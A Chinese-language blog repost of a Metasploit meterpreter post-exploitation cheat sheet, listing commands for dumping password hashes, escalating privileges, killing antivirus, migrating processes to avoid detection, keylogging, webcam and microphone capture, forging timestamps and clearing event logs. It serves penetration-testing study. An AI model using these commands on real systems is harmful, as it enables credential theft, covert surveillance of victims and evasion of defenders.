搜索
查看
编辑修改
首页
UNITY
NODEJS
PYTHON
AI
GIT
PHP
GO
CEF3
JAVA
HTML
CSS
搜索
菜鸟追梦旅行
这个屌丝很懒,什么也没留下!
关注作者
热门标签
jquery
HTML
CSS
PHP
ASP
PYTHON
GO
AI
C
C++
C#
PHOTOSHOP
UNITY
iOS
android
vue
xml
爬虫
SEO
LINUX
WINDOWS
JAVA
MFC
CEF3
CAD
NODEJS
GIT
Pyppeteer
article
热门文章
1
基于SpringBoot+Vue的高校学生宿舍管理系统(可做毕设课设)_基于springboot的宿舍管理系统
2
FPGA/IC秋招面试题 1(解析版)_fpga题库
3
YOLOv8最新改进系列:YOLOv8融合SwinTransformer模块,有效提升小目标检测效果!_yolov8小目标优化
4
【华为OD机试真题 Java语言】407、分配土地 | 机试真题+思路参考+代码解析(C卷)(本题100%)_村庄插旗子 java
5
属于微型计算机主要性能指示,历年软考程序员考试历年真题重点题
6
springboot失物招领系统 计算机毕业设计源码70116
7
【FFmpeg】自定义编码器适配_ffcodec
8
腾讯云GPU服务器GPU计算型8核GN7性能评测_gpu计算型gn7
9
010、Python+fastapi,第一个后台管理项目走向第10步:ubutun 20.04下安装ngnix+mysql8+redis5环境
10
大数据应用除了在体育项目中,还有这些切身感受得到的应用案例_expressscripts应用大数据
当前位置:
article
> 正文
12、后渗透测试--meterpreter使用_后渗透测试命令
作者:菜鸟追梦旅行 | 2024-04-20 09:54:34
赞
踩
后渗透测试命令
Post后渗透模块
:
在meterpreter > 中我们可以使用以下的命令来实现对目标的操作。
一、基本系统命令
sessions
# sessions –h 查看帮助
sessions -i <ID值>
# 进入会话 -k 杀死会话
background
# 将当前会话放置后台
info
# 查看已有模块信息
getuid
#
查看获取的当前权限
getsystem
#
提权
getpid
# 获取当前进程的pid
sysinfo
# 查看目标机系统信息
ps
# 查看当前活跃进程 kill <PID值> 杀死进程
idletime
#
查看目标机运行时间
hashdump
# 从SAM数据库
导出密码的哈希
reboot / shutdown
# 重启/关机
shell
# 进入目标机cmd shell
load kiwi
#
加载wiki模块
run
#
使用扩展库,
执行已有的模块,输入run后按两下tab,列出已有的脚本
run killav
#
关闭杀毒软件
run scraper
#
查看目标主机详细信息
二
、execute执行文件
execute 参数
-
f 可执行文件
#
执行可执行程序
execute -H -i -f cmd.exe
# 创建新进程cmd.exe,-H不可见,-i交互
三、目录/文件操作
pwd / getwd
#
目标机器上当前目录
(windows)
cd
# 目标机器上切换目录
ls
#
目标机器上
显示
dir
#
目标机器上
查看
mkdir dir1 dir2
mv oldfile newfile
rmdir dir1
getlwd / lpwd
#
查看攻击机当前目录
(Linux)
lls
# 在
攻击机显示
lcd
# 在
攻击机上切换目录
cat C:\\Users\\zq\\Desktop\\123.txt
#
目标机器上
读取内容
edit C:\\Users\\zq\\Desktop\\123.txt
# 篡改目标机器上的文件
search
-
f
*.
jsp
-
d e
:
\
#
搜索
E
盘中所有以
.jsp
为后缀的文件
upload msfdb /root/Desktop/Kage.0.1.1-beta_linux.AppImage C:\\Users\\zq\\Desktop
#
将两个文件
传到目标机的桌面
download C:\\Users\\zq\\Desktop\\123.txt
/
root
#
将目标机的
e:\test.txt
文件下载到
/root
目录
下
四、timestomp伪造时间戳
timestomp C:// -h
# 查看帮助
timestomp -v C://2.txt
# 查看时间戳
timestomp C://2.txt -f C://1.txt
# 将1.txt的时间戳复制给2.txt
五、进程
ps
#
查看目标主机活跃进程信息
getpid
#
查看当前
Meterpreter Shell
的进程
migrate
1732
#
将当前
Meterpreter Shell
的进程迁移到
PID
为
1732
的进程上,这样不容器被发现
kill <pid值>
# 杀死进程
六、网络
arp
# 显示目标机器arp缓存
getproxy
# 显示目标机器的代理
ifconfig
netstat -ano
route
portfwd
# 端口重定向
portfwd add -l 3389 -p 3389 -r 172.16.0.100
# 将目标机的3389端口转发到本地3389端口
然后使用rdesktop ip远程登录:
七、autoroute添加路由
run autoroute –h
# 查看帮助
run autoroute -s 192.168.159.0/24
# 添加到目标环境网络
run autoroute –p
# 查看添加的路由
然后可以利用arp_scanner、portscan等进行扫描
run post/windows/gather/arp_scanner RHOSTS=192.168.159.0/24
run auxiliary/scanner/portscan/tcp RHOSTS=192.168.159.144 PORTS=3389
八、uictl开关键盘/鼠标
uictl [enable/disable] [keyboard/mouse/all]
# 开启或禁止键盘/鼠标
uictl disable mouse
# 禁用鼠标
uictl disable keyboard
# 禁用键盘
九、用户接口命令(键盘嗅探,鼠标、屏幕、音频、摄像头
)
4-18 Meterpreter用户接口命令1_哔哩哔哩_bilibili
4-19 Meterpreter用户接口命令2_哔哩哔哩_bilibili
4-20 Meterpreter用户接口命令3_哔哩哔哩_bilibili
keyscan_start
#
开启键盘记录功能
在靶机上用键盘输入内容
keyscan_dump
#
显示捕捉到的键盘记录信息
keyscan_stop
#
停止键盘记录功能
鼠标:
screenshare
# 屏幕共享
保存在/usr/share/metasploit-framework/uDRIzzpV.html,可以直接浏览器打开。
screenshot
#
截图
record_mic
# 音频
play
# 播放音频
webcam_list
#
查看目标主机的摄像头
webcam_snap
# 目标主机摄像头
拍照
webcam_stream
# 目标主机通过摄像头
开视频
webcam_chat -h
#
开始与目标进行视频对话。
十、clearav清除日志
clearev
#
清除windows中的应用程序日志、系统日志、安全日志
十一、信息搜集脚本
run post
/
windows
/
manage
/
migrate
#
自动进程迁移
run post
/
windows
/
gather
/
checkvm
#
查看目标主机是否运行在虚拟机上
run post/linux/gather/checkvm
# 是否虚拟机
run post
/
windows
/
manage
/
killav
#
关闭杀毒软件
run post
/
windows
/
manage
/
enable_rdp
#
开启远程桌面服务
run post
/
windows
/
manage
/
autoroute
#
查看路由信息
run post/windows/gather/dumplinks
#获取最近的文件操作
run post
/
windows
/
gather
/
enum_logged_on_users
#
列举当前登录的用户
run post
/
windows
/
gather
/
enum_applications
#
列举应用程序
run windows
/
gather
/
credentials
/
windows_autologin
#
抓取自动登录的用户名和密码
run windows
/
gather
/
smart_hashdump
#dump
出所有用户的
hash
声明:
本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:
https://www.wpsshop.cn/w/菜鸟追梦旅行/article/detail/456722
推荐阅读
article
PyCharm
安装
教程和
激活
详细讲解(全网最快捷、最靠谱
的
方式)
_
pycharm
激活
...
全网最快捷、最方便、最详细
的
PyCharm
激活
方式。
_
pycharm
激活
pycharm
激活
Py...
赞
踩
article
CSP
2022 游记_游记
csdn
...
CSP
2022的游记,讲述了一位蒟蒻xxs的二等事迹_游记
csdn
游记
csdn
...
赞
踩
article
RabbitMQ
部署_
rabbitmq
部署到
服务器
...
安装erlang。运行以下命令,安装erlang所需要的依赖包_
rabbitmq
部署到
服务器
rabbitmq
部署到
服务器
...
赞
踩
article
纯干货之
阿里
云
云
计算
认证
,赶紧收藏!_
阿里
云
认证
和
cka
认证
...
阿里
云
作为占领国内
云
计算
市场份额第一的企业,有很多中小型企业也都在用
阿里
云
的产品,这就导致市面上急需要会使用
阿里
云
产品的...
赞
踩
article
基于
STM32
ARM+
FPGA
伺服
控制系统
(二)软件及
FPGA
设计_基于
fpga
的
伺服系统
数字控制...
然后判断高电平的数量多还是低电平的数量多,最后将累加后电平数量多的一方的值。不同的控制帧指令给编码器来获取相应的信息,然...
赞
踩
article
[
K8S
:
命令
执行:权限异常:解决篇]:通过更新
kubeconfig
配置相关信息_
error
fro...
[
K8S
:
命令
执行:权限异常:解决篇]:通过更新
kubeconfig
配置相关信息_
error
from
server
(...
赞
踩
article
FPGA
学习之路—接口(3)—
SPI
详解及
Verilog
源码
分析
_
fpga
spi
主机
代码
...
FPGA
学习之路——
SPI
详解及
Verilog
源码
分析
概述
SPI
= Serial Peripheral Interfa...
赞
踩
article
西门子
S7系列
中间人
攻击
:
流量
劫持和转发(一)_
plc
中间人
攻击
...
前言:前一篇文章我主要讲述了
西门子
S7系列PLC安全防护,在
攻击
利用方面也重点提到了
中间人
攻击
,今天我主要来讲述一下中间...
赞
踩
article
Java
接口
自动化
框架系列03:
接口
自动化
构建
git
操作
_
操作
git
服务
接口
...
git
测试开发规范1. master: 稳定分支,执行的代码基于该分支
构建
。 1.1. 仅接受从开发dev分支merge...
赞
踩
article
算法与
数据结构
---
串
,
数组
和广义表
---
串
_不用
nextval
数组
...
1.主
串
和子
串
的关系和集合跟子集之间的关系类似但不相同
,
主
串
的子
串
必须是由主
串
中连续的字符组成的!!!
,
真子
串
是不包含主...
赞
踩
article
Mac
连接
显示器
,
外接
显示器
不出影像
_
machdmi
连接
电视没有画面...
### 1. 现象 - 转换头
,
连接
线已正确
连接
; -
显示器
电源等也亮
,
且是已有视频信号的状态; - 查看设置--显示...
赞
踩
article
库卡
机器人
的
基本操作
_
库卡
示教器
按键说明书...
本文讲解了新手对于
库卡
机器人
的一些常用操作,希望能帮助新手快速入门
库卡
机器人
的相关操作,可以通过目录导航到对应的内容。文...
赞
踩
article
Linux
搭建
zookeeper
与
kafka
集群
配置
_
linux
安装
kafka
和
zokeeper
...
Kafka依赖zk,以集群方式工作,每台机器称为一个blocker(与其他分布式环境不同的是,仅有1台blocker也能...
赞
踩
article
NLP
技术
发展综述_
nlp
综述...
NLP
技术
发展史2001 - Neural language models(神经语言模型)2008 - Multi-ta...
赞
踩
article
[
C++
]
哈希
应用之位
图
&
布隆
过滤器
...
我们之前学习了
哈希
表,
哈希
表通过映射关系,实现了O(1)的复杂度来查找数据,
哈希
在实践中是一个非常重要的思想,今天要学习...
赞
踩
article
云
计算
机
证书
什么难度,
云
技术
什么
认证
最有权威
云
计算
职业路上必备的十大
证书
......
云
技术
应用在各个领域,学会
云
技术
可以走遍天下都不怕。有些人会说
云
技术
很难判断一个人的
技术
高低,当然了,一些相关
认证
是有一...
赞
踩
article
通信
协议之
串口
通信
_
串口
通信
rx和tx...
串口
通信
在早期是计算机与外界
通信
的主要手段,那时候的计算机基本上都标配有
串口
以实现和外部
通信
,而现如今PC上基本上很少见...
赞
踩
article
【
51
单片机
STC89C52
】
舵机
控制综合篇_
stc89c52
超声波
测距...
【
51
单片机
STC89C52
】感应开关盖垃圾桶
超声波
模块,震动传感器,按键控制SG90
舵机
SG90
舵机
使用资源:定时器/...
赞
踩
article
STM32F103C8T6
最小
系统
板
可以输入
5v
供电
!_
stm32f103c8t6
电池
供电
问题...
原因在于
板
子搭载了
5v
转3.3v的稳压芯片,在
板
子的背面。_
stm32f103c8t6
电池
供电
问题stm32f103c8...
赞
踩
article
整理
GitHub
近期
热门开源后台
管理系统
...
1、vue-element-adminGithub Star 数 64624, Github 地址:https://gi...
赞
踩
相关标签
pycharm
ide
python
c++
rabbitmq
云计算
阿里云
fpga开发
stm32
arm开发
kubernetes
linux
容器
fpga
verilog
spi
安全
渗透测试
git
java
自动化
数据结构
macos
外接显示器
不显示